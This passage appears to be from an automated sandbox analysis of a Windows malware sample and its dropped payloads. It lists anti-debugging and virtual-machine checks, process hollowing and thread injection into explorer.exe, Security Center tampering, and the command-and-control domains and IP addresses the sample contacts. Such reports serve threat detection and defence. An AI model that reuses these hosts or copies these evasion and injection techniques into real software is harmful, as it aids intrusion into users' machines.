                      Source: explorer.exe, 0000000A.00000000.332149562.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 0000000A.00000000.332068185.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: explorer.exe, 0000000A.00000000.296393454.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000018.00000002.432567501.000001C13CAA6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
                      Source: explorer.exe, 0000000A.00000000.300343479.0000000008778000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}USERDOM
                      Source: explorer.exe, 0000000A.00000000.296393454.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: WerFault.exe, 00000015.00000003.425462493.0000000004A2F000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.425376239.0000000004A82000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000002.435145098.0000000004A82000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000002.434911058.0000000004A2F000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.433029816.000001C13CAEB000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000000A.00000000.332068185.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.552754472.00000203DA029000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.423478230.0000000004A81000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Code function: 26_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_004196BC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe System information queried: ModuleInformation

                      Anti Debugging:

                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\rcvfbte System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_0042D560 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_00570042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe Code function: 16_2_00470083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe Code function: 16_2_0048092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe Code function: 16_2_00480D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Code function: 17_2_006C0042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00888D13 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Code function: 26_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Code function: 26_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\rcvfbte Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_004228F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_0042C962 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_00419905 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Code function: 20_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Memory protected: page guard
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_0043A800 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_004228F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_0042BAA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_00428310 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe Code function: 16_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Code function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe Network Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exe Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exe Domain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exe Domain query: goo.su
                      Source: C:\Windows\explorer.exe Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exe File created: 293.exe.10.dr
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\rcvfbte Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\rcvfbte Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Memory written: C:\Users\user\Desktop\ZA3cYU28Yl.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Memory written: C:\Users\user\AppData\Local\Temp\A019.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Memory written: unknown base: 400000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Code function: 1_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Thread created: C:\Windows\explorer.exe EIP: 5AC1930
                      Source: C:\Users\user\AppData\Roaming\rcvfbte Thread created: unknown EIP: 5C11930
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Thread created: unknown EIP: 76B1930
                      Sample uses process hollowing technique
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Section unmapped: unknown base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Section unmapped: unknown base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Section unmapped: unknown base address: 400000
                      .NET source code references suspicious native API functions
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: B217.exe.10.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.2.B217.exe.a90000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.B217.exe.1b0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.B217.exe.1b0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe Process created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: C:\Users\user\AppData\Roaming\rcvfbte Process created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe Process created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Process created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Code function: 26_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 0000000A.00000000.306398787.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.294840531.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.323374990.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.296309785.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000000A.00000000.317718253.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.300343479.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.332149562.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B217.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 1_2_00419B62 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Code function: 26_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

                      Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
